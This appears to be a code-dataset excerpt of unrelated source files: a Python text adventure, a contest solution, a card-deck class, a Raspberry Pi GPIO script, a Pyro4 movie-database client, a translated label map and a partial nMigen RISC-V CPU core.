            #     print(current_room)
            #     print("")
            # elif move.lower() == current_room.direction2:
            #     current_room = rooms[current_room.neighbor2]
            #     self.player.moves += 1
            #     print(current_room)
            #     print("")
            elif move == "w".lower():
                if room == room_1.room or room == room_2.room:
                    print("There's nowhere to go! Try a different direction.")
                    print("")
                elif room == room_3.room:
                    room = room_1.room
                    self.player.moves += 1
                    print(room_1)
                    print("")
                elif room == room_4.room:
                    room = room_2.room
                    self.player.moves += 1
                    print(room_2)
                    print("")
            elif move == "a".lower():
                if room == room_1.room or room == room_3.room:
                    print("There's nowhere to go! Try a different direction.")
                    print("")
                elif room == room_2.room:
                    room = room_1.room
                    self.player.moves += 1
                    print(room_1)
                    print("")
                elif room == room_4.room:
                    room = room_3.room
                    self.player.moves += 1
                    print("")
                    print(room_3)
            elif move == "s".lower():
                if room == room_3.room or room == room_4.room:
                    print("There's nowhere to go! Try a different direction.")
                    print("")
                elif room == room_1.room:
                    room = room_3.room
                    self.player.moves += 1
                    print(room_3)
                    print("")
                elif room == room_2.room:
                    room = room_4.room
                    self.player.moves += 1
                    print(room_4)
                    print("")
            elif move == "d".lower():
                if room == room_2.room or room == room_4.room:
                    print("There's nowhere to go! Try a different direction.")
                    print("")
                elif room == room_1.room:
                    room = room_2.room
                    self.player.moves += 1
                    print(room_2)
                    print("")
                elif room == room_3.room:
                    room = room_4.room
                    self.player.moves += 1
                    print(room_4)
                    print("")
            else:
                print("That's not a valid input.")
                print("")
# Start the game only when executed as a script; previously this ran on
# import (Game.__init__ blocks on input()), breaking any importer.
if __name__ == "__main__":
    game = Game()
    game.play_game()
|
22,026 | 6e99672eb164e020c779b3ce2ce80ed1ac2c1df0 | def printout(n, v):
print "Case #" + str(n) + ": " + str(v)
# NOTE: this file is Python 2 (print statements, raw_input, xrange).
def isCorrect(arr):
    """Debug checker for a placed grid: collect all non-'.' symbols with
    their coordinates and print a warning when two non-'+' symbols share a
    row/column, or two non-'x' symbols share a diagonal."""
    symbols = set()
    for i,j in enumerate(arr):
        for k, l in enumerate(j):
            if l != '.':
                symbols.add((l, i, k))
    for i in symbols:
        for j in symbols:
            if i != j:
                # same row or column: allowed only if one of them is '+'
                if i[1]==j[1] or i[2]==j[2]:
                    if i[0] == '+' or j[0] == '+':
                        pass
                    else:
                        print "ZLEEEE"
                # same diagonal: allowed only if one of them is 'x'
                if i[1]+i[2] == j[1]+j[2] or i[1]-i[2]==j[1]-j[2]:
                    if i[0] == 'x' or j[0] == 'x':
                        pass
                    else:
                        print "ZLEEEE2"
def call(ii):
    """Solve one test case (Python 2): read n, m and m pre-placed pieces,
    then print the achievable score and the list of added pieces."""
    n, m = [int(i) for i in raw_input().split()]
    # `row` mirrors the first grid row; track the column of a non-'+'
    # piece there (if any), since only one 'o'/'x' fits per row/column
    row = [' ' for i in range(n)]
    nonplus = -1
    for i in range(m):
        v, r, c = raw_input().split()
        row[int(c)-1] = v
        if v != '+':
            nonplus = int(c)-1
    res = []
    if nonplus == -1:
        # no non-'+' piece given: place an 'o' in the top-left corner
        nonplus = 0
        row[0] = 'o'
        res.append(('o', 0, 0))
    for i,v in enumerate(row):
        if v == ' ':
            res.append(('+', 0, i))
        elif v == 'x':
            # upgrade an existing 'x' to 'o'
            res.append(('o', 0, i))
            nonplus = i
    # fill diagonals with 'x', skipping the nonplus column
    for i in range(0,nonplus):
        res.append(('x', i+1, i))
    for i in range(nonplus+1, n):
        res.append(('x', i, i))
    for i in range(1,n-1):
        res.append(('+', n-1, i))
    """
    #print n, row
    s=[['.' for j in range(n)] for i in range(n)]
    s[0] = row
    for i in res:
        s[i[1]][i[2]] = i[0]
    st=''
    for i in s:
        for j in i:
            st+=j
        st+='\n'
    #print st
    return"""
    printout(ii, str((3*n - 2) if n != 1 else 2)+ ' '+str(len(res)))
    #isCorrect(s)
    for i in res:
        print i[0], i[1]+1, i[2]+1
# script entry (Python 2): read the test-case count, solve each 1-indexed
t = int(raw_input())
for ii in xrange(t):
    call(ii+1)
22,027 | 5098276f4fde8e6bfe42057c6adca3e31e863fb5 | #
#
#
# Description-----------------------------------------------------------------------------------------------------------
# Deck.py is a class file containing functions for the manipulations of cards, such as creating decks,
# shuffling, sorting, discarding
# Inherits the cards class
#
#
#
#
#
#
#
#
import random
# ----------------------------------------------------------------------------------------------------------------------
# Import statements
import cards
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
# CONSTANTS
NUM_SUITS = 4 # four suits in standard card deck
NUM_PER_SUIT = 13 # 13 cards in a standard suit
CUT_BUFFER = 5 # number of cards from end considered a viable selection for a cut
MIX_BUFFER = 4 # range for cards to be swapped in a mix shuffle
# ----------------------------------------------------------------------------------------------------------------------
class Deck:
    """A deck of playing cards built from cards.Card, with shuffle (cut/mix),
    several sort strategies, and debug printing."""

    def __init__(self):
        # deck_list: ordered list of Card objects; size: cached length
        self.deck_list = []
        self.size = 0
        return

    def make_deck(self):
        # the following function makes a deck
        for i in range(NUM_SUITS):
            for j in range(NUM_PER_SUIT):
                new_card = cards.Card(j, i)  # create a temporary card
                self.deck_list.append(new_card)  # add cards to end of array
                # new_card.print_properties()  # print card, mostly for testing.
        self.size = len(self.deck_list)
        return

    def print_deck(self):
        """Print every card in order (debug helper)."""
        for i in range(self.size):
            self.deck_list[i].print_properties()
        print()
        return

    def shuffle(self):
        # takes in an array of cards, and randomly cuts, and mixes cards
        # (30-100 rounds of interleaved mixes and cuts)
        it = random.randint(30, 100)
        for i in range(it):
            self.mix(random.randint(10, 30))
            self.cut()
            self.mix(random.randint(10, 30))
            self.mix(random.randint(10, 30))
            self.cut()
            self.mix(random.randint(10, 30))
            self.mix(random.randint(10, 30))
            self.mix(random.randint(10, 30))
            self.cut()
        return

    def cut(self):
        # cuts a deck at a given index, and places the lower half atop the cut location.
        random.seed()
        cut_index = random.randint(CUT_BUFFER, self.size-CUT_BUFFER)
        # selection size represents the number of cards at the bottom which must me moved to top
        selection_size = self.size-cut_index
        # if less than half of deck size, should shift top down instead of bottom up.
        if cut_index < (self.size-1)/2:
            for i in range(cut_index):
                temp = self.deck_list[0]
                self.deck_list.append(temp)
                self.deck_list.pop(0)
        else:
            for i in range(selection_size):
                # a cut gets a random value with an offset of at least CUT_BUFFER from the deck ends
                # and selects cards from selected index to the bottom of the deck, and inserts them at the start of
                # the deck and pops off the old values as we go.
                temp = self.deck_list[self.size-1]
                self.deck_list.insert(0, temp)
                self.deck_list.pop()
        return

    def mix(self, iterations):
        # mixes the cards provided by randomly swapping indexes within 4 places of one another
        # parameter iterations defines number of cards swapped. by default, deck size is used.
        if iterations is None:
            iterations = self.size
        for i in range(iterations):
            swap_dex = random.randint(-3, 3)
            index = random.randint(MIX_BUFFER, self.size-MIX_BUFFER)
            temp = self.deck_list[index]
            self.deck_list[index] = self.deck_list[index + swap_dex]
            self.deck_list[index + swap_dex] = temp
        return

    def sort_value(self, group_size, offset):
        # attempting to integrate group_size and offset to allow user to sort a section of say 5 cards by value. Is
        # proving to be difficult- mostly gets sorted but then stops a few iterations short of completion apparently.
        # the idea is to operate this on a deck that was just sorted by suit, and then call this on the number of cards
        # in a suit resulting in a sorted subset
        if group_size is None:
            group_size = self.size
        if offset is None:
            offset = 0
        # this function uses a selection sort algorithm to sort the deck
        # based on the card values, Ace being low in this instance (ignores suit)
        start_dex = offset * group_size
        end_dex = start_dex + group_size - 1
        mindex = 0
        for i in range(start_dex, end_dex):
            mindex = i
            for j in range(i+1, end_dex+1):  # for j=i+1 < self.size j++
                if self.deck_list[j].position < self.deck_list[mindex].position:
                    mindex = j
            self.swap(i, mindex)
        return

    def sort_suit(self):
        # this function uses a selection sort algorithm to sort the deck
        # based on the suit values, alphabetical indexing. (ignores value)
        mindex = 0
        for i in range(self.size-1):
            mindex = i
            for j in range(i+1, self.size):  # for j=i+1 < self.size j++
                if self.deck_list[j].suit[0] < self.deck_list[mindex].suit[0]:
                    mindex = j
            self.swap(i, mindex)
        return

    def simple_sort(self):
        # an inefficient but simple way to return the deck to the original sorted state
        # (alphabetical by suit, low to high material value).
        self.deck_list = []
        self.make_deck()

    def super_sort(self):
        # currently doesn't work... Supposed to sort them by suit, and then by value, but there's some sort of error.
        group_size = int(self.size / NUM_SUITS)
        print("Group size is " + str(group_size))
        self.sort_suit()
        # self.print_deck()
        print()
        for i in range(NUM_SUITS):
            self.sort_value(group_size, i)

    def swap(self, elem1, elem2):
        # exchange the cards at the two indices
        temp = self.deck_list[elem1]
        self.deck_list[elem1] = self.deck_list[elem2]
        self.deck_list[elem2] = temp
        return
|
22,028 | a2b4ddd78deef9d83c9fd47578b11466153682c5 | import webiopi
import datetime
GPIO = webiopi.GPIO
LIGHT = 17 # GPIO pin using BCM numbering
LED = 15
# setup function is automatically called at WebIOPi startup
# setup function is automatically called at WebIOPi startup
def setup():
    # light sensor is an input with pull-down; LED drives an output
    GPIO.setFunction(LIGHT, GPIO.IN, GPIO.PUD_DOWN)
    GPIO.setFunction(LED, GPIO.OUT)
# loop function is repeatedly called by WebIOPi
# loop function is repeatedly called by WebIOPi
def loop():
    """Mirror the light-sensor input onto the LED, polling once per second."""
    # Sample the pin once so both comparisons see the same reading; the
    # original read the pin twice, which could race a level change between
    # the two reads.
    state = GPIO.digitalRead(LIGHT)
    if state == GPIO.LOW:
        GPIO.digitalWrite(LED, GPIO.LOW)
    elif state == GPIO.HIGH:
        GPIO.digitalWrite(LED, GPIO.HIGH)
    # gives CPU some time before looping again
    webiopi.sleep(1)
# destroy function is called at WebIOPi shutdown
# destroy function is called at WebIOPi shutdown
def destroy():
    # leave the LED off when the service stops
    GPIO.digitalWrite(LED, GPIO.LOW)
|
22,029 | 8f515c1978685a2002684b0d0818ff7afb771c3e | import Pyro4
from enums import ROp
def get_user_id():
    """Prompt until the user enters a numeric ID; return it as an int."""
    raw = input('Enter a user ID (number): ')
    while not raw.isdigit():
        print('- ' * 32)
        print(f'Invalid user ID [ {raw} ]. User ID must be a number.')
        print('- ' * 32)
        raw = input('Enter a user ID (number): ')
    return int(raw)
def get_title():
    """Prompt for a movie title; lower-cased for case-insensitive matching."""
    title = input('Enter movie title: ').lower()
    return title

def get_tag():
    """Prompt for a free-form movie tag (case preserved)."""
    tag = input('Enter a tag for the movie: ')
    return tag

def get_genre():
    """Prompt for a movie genre; lower-cased for case-insensitive matching."""
    genre = input('Enter a movie genre: ').lower()
    return genre
def get_rating():
    """Prompt for a movie rating and return it as a float in [0, 5],
    rounded to the nearest 0.5; re-prompts on non-numeric or out-of-range
    input until a valid value is accepted."""
    rating = input('Enter movie rating (0 - 5): ')
    while True:
        try:
            rating = float(rating)
            if not 0 <= rating <= 5:
                print()
                print('- ' * 32)
                print(f'Invalid movie rating [ {rating} ]. ',
                      'Rating must be between 0 - 5.')
                print('- ' * 32)
                print()
                rating = input('Enter movie rating (0 - 5): ')
                continue
            elif rating % 0.5 != 0:
                # snap to the nearest half-star and inform the user
                rating = round(rating * 2) / 2
                print('Your rating was rounded to the nearest 0.5.')
            break
        except ValueError:
            print()
            print('- ' * 32)
            print(f'Invalid movie rating [ {rating} ]". ',
                  'Rating must be a number.')
            print('- ' * 32)
            print()
            rating = input('Enter movie rating (0 - 5): ')
            continue
    return rating
def format_search_result(result, search_var, search_val):
    """Build a printable summary of search results, or a no-results line.

    `result` is a sequence of rows with a 'title' key; `search_var` names
    the field searched (title/genre/tag) and `search_val` the query.
    """
    if not result:
        return f'No results for {search_var} "{search_val}"'
    titles = "\n".join(row['title'] for row in result)
    return (f'Results for {search_var} "{search_val}" ({len(result)} results):\n'
            f'{titles}')
class Client:
'''
Class for Client program of distributed system.
'''
def __init__(self):
self.menu_options = [
' 1. Rate a movie',
' 2. Add a tag to a movie',
' 3. Get the average rating for a movie',
' 4. Get your ratings',
' 5. Get the genres for a movie',
' 6. Get the tags for a movie',
' 7. Search movies by title',
' 8. Search movies by genre',
' 9. Search movies by tag'
]
self.frontend = self._find_frontend()
def send_request(self, request):
'''
Send a request to the front end, handling any errors which occur.
Params:
(tuple) request: request to send, consisting of a command and args
Returns:
(bool) error: whether an error occurred at any point
result: if error, this is a string describing the error. Otherwise
the response to the request by the front end.
'''
result = None
error = True
if self.frontend is None:
try:
self.frontend = self._find_frontend()
except Pyro4.errors.NamingError:
print('Could not find Pyro nameserver.')
if self.frontend is not None:
try:
result = self.frontend.send_request(request)
error = False
except Pyro4.errors.ConnectionClosedError:
self.frontend._pyroRelease()
self.frontend = None
result = 'Could not connect to front end server.'
except Exception as e:
result = e
else:
result = 'Could not find front end server.'
return error, result
def print_menu(self):
print()
print(' --- Movie Database ---')
print()
[print(option) for option in self.menu_options]
print()
print(f' {len(self.menu_options) + 1}. Exit')
print()
print('Enter option: ', end='')
def main(self):
'''
Main loop of client program.
'''
userId = get_user_id()
while True:
request = None
response = None
self.print_menu()
choice = input()
print()
if choice == '1':
op = ROp.ADD_RATING.value
title = get_title()
rating = get_rating()
request = (op, userId, title, rating)
error, result = self.send_request(request)
if error:
response = result
else:
response = f'{result}\n\n'
response += f'You have rated {title} a {rating}/5'
elif choice == '2':
op = ROp.ADD_TAG.value
title = get_title()
tag = get_tag()
request = (op, userId, title, tag)
error, result = self.send_request(request)
if error:
response = result
else:
response = f'{result}\n\n'
response += f'You have tagged {title} with "{tag}"'
elif choice == '3':
op = ROp.GET_AVG_RATING.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
response = (f'Average rating for {title}: '
f'{round(result, 1)}/5')
elif choice == '4':
op = ROp.GET_RATINGS.value
title = None
print('Choose a movie you want to see your rating of,',
'or leave it blank to view all of your ratings.')
title = get_title()
request = (op, userId, title)
error, result = self.send_request(request)
if error:
response = result
else:
if result:
response = ' Title'.ljust(50, ' ') + '| Rating\n'
response += '-' * 65 + '\n'
for row in result:
if len(row['title']) > 50:
response += row['title'][:48] + '- | '
response += row['rating'] + '\n -'
response += row['title'][48:].ljust(48, ' ')
response += '|\n'
else:
response += row['title'].ljust(50, ' ') + '| '
response += row['rating'] + '\n'
else:
response = 'You have submitted no ratings yet.'
elif choice == '5':
op = ROp.GET_GENRES.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
result = "\n".join(result)
response = f'Genres for {title}:\n{result}'
elif choice == '6':
op = ROp.GET_TAGS.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
result = "\n".join(result)
response = f'Tags for {title}:\n{result}'
elif choice == '7':
op = ROp.SEARCH_TITLE.value
title = get_title()
request = (op, title)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(
result, 'title', title)
elif choice == '8':
op = ROp.SEARCH_GENRE.value
genre = get_genre()
request = (op, genre)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(
result, 'genre', genre)
elif choice == '9':
op = ROp.SEARCH_TAG.value
tag = get_tag()
request = (op, tag)
error, result = self.send_request(request)
if error:
response = result
else:
response = format_search_result(result, 'tag', tag)
elif choice == '10':
print('Bye!')
break
else:
print('- ' * 32)
print(
f'Invalid option [ {choice} ]. ',
f'Enter an option from 1 - {len(self.menu_options) + 1}.'
)
print('- ' * 32)
continue
print()
print(response)
print()
input('Press ENTER to continue.')
@staticmethod
def _find_frontend():
    """Locate the front end server via the Pyro nameserver.

    Returns:
        A Pyro4.Proxy for the object registered as 'network.frontend',
        or None when no such registration exists.
    """
    with Pyro4.locateNS() as nameserver:
        try:
            return Pyro4.Proxy(nameserver.lookup('network.frontend'))
        except Pyro4.errors.NamingError:
            return None
# Script entry point: run the interactive client until the user quits.
if __name__ == '__main__':
    try:
        client = Client()
        try:
            client.main()
        except KeyboardInterrupt:
            # User pressed CTRL+C while inside the interactive menu loop.
            print('\nCTRL+C pressed, exiting.')
    except Pyro4.errors.NamingError:
        # NOTE(review): presumably raised while locating the Pyro nameserver
        # during Client() construction — confirm where it can propagate from.
        print('Could not find Pyro nameserver, exiting.')
|
22,030 | 36db202f982e0b85acb4757e1cd3e8a7612b6cc2 | NAME_DISPLAY_MAP = {
"vt_symbol": " native code ",
"direction": " direction ",
"price": " price ",
"volume": " quantity ",
"time": " execution time ( second )",
"interval": " each round interval ( second )",
"offset": " kaiping ",
"active": " algorithmic state ",
"traded": " the number of transactions ",
"order_volume": " single delegate ",
"timer_count": " countdown round ",
"total_count": " cumulative countdown ",
"template_name": " algorithm template ",
"display_volume": " number hang out ",
"stop_price": " trigger price ",
"price_add": " commissioned super price ",
"step_price": " trading grid spacing ",
"step_volume": " grid number of transactions ",
"order_type": " types of ",
"active_vt_symbol": " initiative leg ",
"passive_vt_symbol": " passive leg ",
"spread_up": " spread limit ",
"spread_down": " spread limit ",
"max_pos": " max open "
}
|
22,031 | dd31af337c48ca4a00a6e262044958c7bff6671e | from nmigen import *
from nmigen.asserts import *
from enum import IntEnum
XLEN = 32  # register / data-path width in bits (RV32)
class ALUOp(IntEnum):
    """Operation select codes for Hazard2ALU.

    The encoding is not arbitrary: the ALU distinguishes the bitwise ops
    by op[0:2] alone (AND -> 0b10, OR -> 0b11, XOR falls to the default),
    and treats any op other than ADD as a subtract on its shared adder.
    """
    ADD = 0x0
    SUB = 0x1
    LT = 0x2    # signed less-than
    LTU = 0x4   # unsigned less-than
    AND = 0x6
    OR = 0x7
    XOR = 0x8
    SRL = 0x9   # shift right logical
    SRA = 0xa   # shift right arithmetic (sign-filling)
    SLL = 0xb   # shift left logical
class RVOpc(IntEnum):
    """RISC-V major opcodes, as found in instruction bits [6:2].

    The low two instruction bits (always 0b11 for 32-bit encodings) are
    not stored here; the decoder slices them off (opc = cir[2:7]).
    """
    LOAD = 0b00_000
    MISC_MEM = 0b00_011
    OP_IMM = 0b00_100
    AUIPC = 0b00_101
    STORE = 0b01_000
    OP = 0b01_100
    LUI = 0b01_101
    BRANCH = 0b11_000
    JALR = 0b11_001
    JAL = 0b11_011
    SYSTEM = 0b11_100
def imm_i(instr):
    """Decode the I-format immediate: instr[31:20], sign-extended to 32 bits."""
    return Cat(instr[20:], Repl(instr[-1], 20))
def imm_s(instr):
    """Decode the S-format (store) immediate: {instr[31:25], instr[11:7]}, sign-extended."""
    return Cat(instr[7:12], instr[25:], Repl(instr[-1], 20))
def imm_b(instr):
    """Decode the B-format (branch) immediate; bit 0 is forced to zero, sign-extended."""
    return Cat(C(0, 1), instr[8:12], instr[25:31], instr[7], Repl(instr[-1], 20))
def imm_u(instr):
    """Decode the U-format immediate: instr[31:12] in the upper 20 bits, low 12 bits zero."""
    return Cat(C(0, 12), instr[12:])
def imm_j(instr):
    """Decode the J-format (jump) immediate; bit 0 forced to zero, sign-extended."""
    return Cat(C(0, 1), instr[21:31], instr[20], instr[12:20], Repl(instr[-1], 12))
class Hazard2Shifter(Elaboratable):
    """Barrel shifter shared by all three RV shift operations.

    Left shifts are implemented by bit-reversing the input, shifting right,
    and reversing the result, so only one right-shift datapath is needed.
    """
    def __init__(self):
        self.i = Signal(XLEN)             # value to be shifted
        self.shamt = Signal(range(XLEN))  # shift amount, 0..XLEN-1
        self.right = Signal()             # 1 = shift right, 0 = shift left
        self.arith = Signal()             # 1 = fill with sign bit (arithmetic right)
        self.o = Signal(XLEN)             # shifted result
    def elaborate(self, platform):
        m = Module()
        # Reverse the input for left shifts so the stages below always shift right.
        accum = Signal(XLEN, name="shift_pre_reverse")
        m.d.comb += accum.eq(Mux(self.right, self.i, self.i[::-1]))
        # log2(XLEN) mux stages: stage i conditionally shifts by 2**i, filling
        # vacated high bits with the sign bit only when `arith` is set.
        for i in range(self.shamt.width):
            accum_next = Signal(XLEN, name=f"shift_accum{i}")
            m.d.comb += accum_next.eq(Mux(self.shamt[i],
                Cat(accum[1 << i:], Repl(accum[-1] & self.arith, 1 << i)),
                accum
            ))
            accum = accum_next
        # Undo the initial reversal for left shifts.
        m.d.comb += self.o.eq(Mux(self.right, accum, accum[::-1]))
        return m
class Hazard2ALU(Elaboratable):
    """Single-adder ALU: add/sub, signed/unsigned compare, bitwise ops, shifts.

    Any op other than ADD drives the adder as i0 - i1 (i1 inverted, carry-in 1),
    so the same adder serves SUB and both less-than comparisons.
    """
    def __init__(self):
        self.i0 = Signal(XLEN)                # first operand
        self.i1 = Signal(XLEN)                # second operand
        self.op = Signal(Shape.cast(ALUOp))   # operation select (ALUOp)
        self.take4 = Signal()                 # additionally subtract 4 from the sum
        self.cmp = Signal()                   # comparison result (see below)
        self.o = Signal(XLEN)                 # main result
    def elaborate(self, platform):
        m = Module()
        m.submodules.shifter = shifter = Hazard2Shifter()
        # Add/subtract i0 and i1, then subtract 4 if take4 is true. Use of 3-input adder
        # encourages tools to implement as carry-save. The third term contributes
        # the +1 carry-in for subtraction and 0xFFFF_FFFC (-4) when take4 is set.
        adder = sum((
            self.i0,
            self.i1 ^ Repl(self.op != ALUOp.ADD, XLEN),
            Cat(self.op != ALUOp.ADD, C(0, 1), Repl(self.take4, XLEN - 2))
        ))[:XLEN]
        # Less-than: when the sign bits agree the subtraction's sign decides;
        # otherwise the answer follows directly from the sign bits (which one,
        # depends on signed vs unsigned comparison).
        less_than = Mux(self.i0[-1] == self.i1[-1], adder[-1],
            Mux(self.op == ALUOp.LTU, self.i1[-1], self.i0[-1])
        )
        # cmp doubles as the branch condition: equality for SUB (BEQ/BNE),
        # less-than for the LT/LTU ops (BLT/BGE/BLTU/BGEU).
        m.d.comb += self.cmp.eq(Mux(self.op == ALUOp.SUB, self.i0 == self.i1, less_than))
        # Bitwise ops can be implemented as a single rank of LUT4s. Try to encourage this.
        # Only op[0:2] is decoded here (AND -> 0b10, OR -> 0b11, default XOR).
        bitwise = Signal(XLEN)
        with m.Switch(self.op[0:2]):
            with m.Case(ALUOp.AND & 0x3):
                m.d.comb += bitwise.eq(self.i0 & self.i1)
            with m.Case(ALUOp.OR & 0x3):
                m.d.comb += bitwise.eq(self.i0 | self.i1)
            with m.Case():
                m.d.comb += bitwise.eq(self.i0 ^ self.i1)
        m.d.comb += [
            shifter.i.eq(self.i0),
            shifter.shamt.eq(self.i1),
            shifter.right.eq(self.op != ALUOp.SLL),
            shifter.arith.eq(self.op == ALUOp.SRA)
        ]
        # Final result mux; anything not listed resolves to the bitwise unit.
        with m.Switch(self.op):
            with m.Case(ALUOp.ADD):
                m.d.comb += self.o.eq(adder)
            with m.Case(ALUOp.SUB):
                m.d.comb += self.o.eq(adder)
            with m.Case(ALUOp.LT):
                m.d.comb += self.o.eq(less_than)
            with m.Case(ALUOp.LTU):
                m.d.comb += self.o.eq(less_than)
            with m.Case(ALUOp.SRL):
                m.d.comb += self.o.eq(shifter.o)
            with m.Case(ALUOp.SRA):
                m.d.comb += self.o.eq(shifter.o)
            with m.Case(ALUOp.SLL):
                m.d.comb += self.o.eq(shifter.o)
            with m.Case():
                m.d.comb += self.o.eq(bitwise)
        return m
class Hazard2Regfile(Elaboratable):
    """32 x XLEN register file: two synchronous read ports, one write port.

    Writes to address 0 are suppressed, which keeps x0 hard-wired to zero
    (the memory is initialised to zeroes). Because the read ports are
    non-transparent, a same-cycle write to a register being read is
    forwarded manually via a one-entry bypass register.
    """
    def __init__(self):
        self.raddr1 = Signal(5)     # read port 1 address
        self.raddr2 = Signal(5)     # read port 2 address
        self.ren = Signal()         # shared read enable for both ports
        self.rdata1 = Signal(XLEN)  # read port 1 data (valid cycle after ren)
        self.rdata2 = Signal(XLEN)  # read port 2 data
        self.waddr = Signal(5)      # write address
        self.wdata = Signal(XLEN)   # write data
        self.wen = Signal()         # write enable
        self.mem = Memory(width=XLEN, depth=32, init=[0] * 32)
    def elaborate(self, platform):
        m = Module()
        m.submodules.wport = wport = self.mem.write_port()
        m.submodules.rport1 = rport1 = self.mem.read_port(transparent=False)
        m.submodules.rport2 = rport2 = self.mem.read_port(transparent=False)
        # nMigen/Yosys do not support read enable on read ports with transparency
        # enabled, so need to perform write-to-read bypass manually.
        prev_wdata = Signal(XLEN)
        forward_wdata_to_r1 = Signal()
        forward_wdata_to_r2 = Signal()
        # A bypass is needed when a read and a (non-x0) write coincide.
        next_is_forwarded = self.wen & self.ren & (self.waddr != 0)
        with m.If(next_is_forwarded):
            m.d.sync += prev_wdata.eq(self.wdata)
        # Latch, per port, whether next cycle's read data must come from the
        # bypass register instead of the memory array.
        with m.If(self.ren):
            m.d.sync += [
                forward_wdata_to_r1.eq(next_is_forwarded & (self.waddr == self.raddr1)),
                forward_wdata_to_r2.eq(next_is_forwarded & (self.waddr == self.raddr2))
            ]
        m.d.comb += [
            rport1.addr.eq(self.raddr1),
            rport1.en.eq(self.ren),
            self.rdata1.eq(Mux(forward_wdata_to_r1, prev_wdata, rport1.data)),
            rport2.addr.eq(self.raddr2),
            rport2.en.eq(self.ren),
            self.rdata2.eq(Mux(forward_wdata_to_r2, prev_wdata, rport2.data)),
            wport.addr.eq(self.waddr),
            wport.data.eq(self.wdata),
            # Suppress writes to x0 so it always reads as zero.
            wport.en.eq(self.wen & (self.waddr != 0))
        ]
        return m
class Hazard2CPU(Elaboratable):
    """Small RV32I core with a single shared bus for fetch and load/store.

    The bus signals follow an AHB-lite-style naming/phasing scheme
    (address phase then data phase, hready stalls both) — assumed from the
    h* signal names and the phase tracking below; confirm against the
    intended bus spec. No traps/CSRs are implemented.
    """
    def __init__(self, reset_vector=0x0):
        # First instruction is fetched from reset_vector.
        self.reset_vector = reset_vector
        self.htrans = Signal(2)      # transfer type (0b10 = active, 0b00 = idle)
        self.hwrite = Signal()       # 1 = write transfer
        self.hsize = Signal(3)       # log2(transfer size in bytes)
        self.haddr = Signal(XLEN)    # address-phase address
        self.hwdata = Signal(XLEN)   # data-phase write data
        self.hrdata = Signal(XLEN)   # data-phase read data
        self.hready = Signal()       # 0 = current data phase is stalled
    def elaborate(self, platform):
        m = Module()
        stall = ~self.hready
        ### Stage F ###
        # Data-phase state: whether the in-flight transfer is a fetch or a
        # load/store, plus the attributes needed to align/extend load data.
        i_dph_active = Signal()
        d_dph_active = Signal()
        d_dph_write = Signal()
        d_dph_addr = Signal(2)
        d_dph_size = Signal(2)
        d_dph_signed = Signal()
        cir = Signal(32)         # current instruction register
        cir_valid = Signal()
        load_rdata = Signal(XLEN)
        # Capture fetched instruction at the end of its data phase.
        with m.If(i_dph_active & ~stall):
            m.d.sync += cir.eq(self.hrdata)
        # Align and sign/zero-extend load data according to the recorded
        # data-phase size/address/signedness.
        with m.Switch(d_dph_size):
            with m.Case(2):
                m.d.comb += load_rdata.eq(self.hrdata)
            with m.Case(1):
                hword_rdata = self.hrdata.word_select(d_dph_addr[1:], 16)
                m.d.comb += load_rdata.eq(Cat(hword_rdata, Repl(hword_rdata[-1] & d_dph_signed, XLEN - 16)))
            with m.Case():
                byte_rdata = self.hrdata.word_select(d_dph_addr, 8)
                m.d.comb += load_rdata.eq(Cat(byte_rdata, Repl(byte_rdata[-1] & d_dph_signed, XLEN - 8)))
        ### Stage D/X ###
        # Standard RV32 instruction fields (low two bits of cir are dropped).
        opc = cir[2:7]
        cir_rd = cir[7:12]
        funct3 = cir[12:15]
        cir_rs1 = cir[15:20]
        cir_rs2 = cir[20:25]
        funct7 = cir[25:32]
        rs1 = Signal(XLEN)
        rs2 = Signal(XLEN)
        # pc tracks the *next* fetch address; reset to reset_vector - 4 so the
        # first sequential fetch (pc + 4) targets reset_vector.
        pc = Signal(XLEN, reset=self.reset_vector - 4)
        # ALU, and operand/operation selection
        m.submodules.alu = alu = Hazard2ALU()
        # ALU op for the register/immediate arithmetic formats, decoded from funct3.
        aluop_r_i = Signal(alu.op.shape())
        with m.Switch(funct3):
            with m.Case(0b000):
                # Mask funct7 for I-format (!cir[5]), as it's part of the immediate
                m.d.comb += aluop_r_i.eq(Mux(funct7[5] & cir[5], ALUOp.SUB, ALUOp.ADD))
            with m.Case(0b001):
                m.d.comb += aluop_r_i.eq(ALUOp.SLL)
            with m.Case(0b010):
                m.d.comb += aluop_r_i.eq(ALUOp.LT)
            with m.Case(0b011):
                m.d.comb += aluop_r_i.eq(ALUOp.LTU)
            with m.Case(0b100):
                m.d.comb += aluop_r_i.eq(ALUOp.XOR)
            with m.Case(0b101):
                m.d.comb += aluop_r_i.eq(Mux(funct7[5], ALUOp.SRA, ALUOp.SRL))
            with m.Case(0b110):
                m.d.comb += aluop_r_i.eq(ALUOp.OR)
            with m.Case(0b111):
                m.d.comb += aluop_r_i.eq(ALUOp.AND)
        # Operand/op selection per major opcode. For JAL/JALR the ALU produces
        # the link value (pc, which already points past this instruction); for
        # AUIPC take4 compensates for pc being the next fetch address.
        with m.Switch(opc):
            with m.Case(RVOpc.OP):
                m.d.comb += [
                    alu.i0.eq(rs1),
                    alu.i1.eq(rs2),
                    alu.op.eq(aluop_r_i),
                ]
            with m.Case(RVOpc.OP_IMM):
                m.d.comb += [
                    alu.i0.eq(rs1),
                    alu.i1.eq(imm_i(cir)),
                    alu.op.eq(aluop_r_i),
                ]
            with m.Case(RVOpc.JAL):
                m.d.comb += [
                    alu.i0.eq(pc),
                    alu.i1.eq(0),
                    alu.op.eq(ALUOp.ADD)
                ]
            with m.Case(RVOpc.JALR):
                m.d.comb += [
                    alu.i0.eq(pc),
                    alu.i1.eq(0),
                    alu.op.eq(ALUOp.ADD)
                ]
            with m.Case(RVOpc.BRANCH):
                # BEQ/BNE compare via SUB; BLT/BGE via LT; BLTU/BGEU via LTU.
                m.d.comb += [
                    alu.i0.eq(rs1),
                    alu.i1.eq(rs2),
                    alu.op.eq(Mux(funct3 & 0x6 == 0x0, ALUOp.SUB,
                        Mux(funct3 & 0x6 == 0x4, ALUOp.LT, ALUOp.LTU)))
                ]
            with m.Case(RVOpc.LUI):
                m.d.comb += [
                    alu.i0.eq(0),
                    alu.i1.eq(imm_u(cir)),
